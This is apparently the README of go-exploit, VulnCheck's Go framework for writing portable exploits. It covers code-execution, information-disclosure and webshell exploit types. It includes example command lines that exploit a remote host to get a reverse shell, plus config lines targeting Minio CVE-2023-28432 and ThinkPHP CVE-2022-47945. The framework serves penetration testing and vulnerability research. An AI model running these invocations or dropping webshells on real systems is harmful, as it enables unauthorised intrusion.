go-exploit: Go Exploit Framework
go-exploit: Go Exploit Framework
go-exploit is an exploit development framework for Go. The framework helps exploit developers create small, self-contained, portable, and consistent exploits.
Many proof-of-concept exploits rely on interpreted languages with complicated packaging systems. They implement wildly differing user interfaces and have limited ability to be executed within a target network. Some exploits are integrated into massive frameworks that are burdened by years of features and dependencies which overwhelm developers and hinder the attacker’s ability to deploy the exploits from unconventional locations.
To overcome these challenges, go-exploit offers a lightweight framework with minimal dependencies, written in Go—a language renowned for its portability and cross-compilation capabilities. The framework strikes a balance between simplicity for rapid proof-of-concept development and the inclusion of sophisticated built-in features for operational use.
This project is developed and maintained by VulnCheck.
The go-exploit framework currently supports three exploit types. These types determine how the command-line interface accepts arguments and defines the post-exploitation behavior. The three exploit types are defined in config/config.go:
- CodeExecution
- InformationDisclosure
- Webshell
To configure the exploit type in the exploit’s main function, you can use the config.New function is as follows:
Examples
Code Execution
The Code Execution exploit type assumes that the attacker is attempting to exploit a remote target. Depending on the configured command and control (C2) method, the attacker may need to provide local host information or a bind port. Here is an example of invoking verification, version check, and exploitation for a reverse shell using the Code Execution exploit type:
./exploit -a -v -c -e -rhost 10.12.70.247 -rport 80 -lhost 10.12.70.252 -lport 1270
Information Disclosure
The Information Disclosure exploit type assumes that there is some type of information leak that does not immediately result in code execution. No command and control (C2) is configured for this exploit type. In the main function, it would look like this:
conf := config.New(config.InformationDisclosure, []c2.Impl{}, “Minio API”, “CVE-2023-28432”, 9000)
Depending on the specific exploit, you may need to provide a local host and port using the -lhost and -lport arguments. Here is an example of invoking verification, version check, and exploitation using the Information Disclosure exploit type:
./exploit -v -c -e -s -rhost 10.12.70.247 -rport 443
Webshell
The WebShell exploit type assumes that the exploit will drop a webshell on the remote host. No command and control (C2) is configured for this exploit type. In the main function, it would look like this:
conf := config.New(config.Webshell, []c2.Impl{}, “ThinkPHP”, “CVE-2022-47945”, 8080)
Here is an example of invoking verification, version check, and exploitation using the WebShell exploit type:
./exploit -v -c -e -s -rhost 10.12.70.247 -rport 443
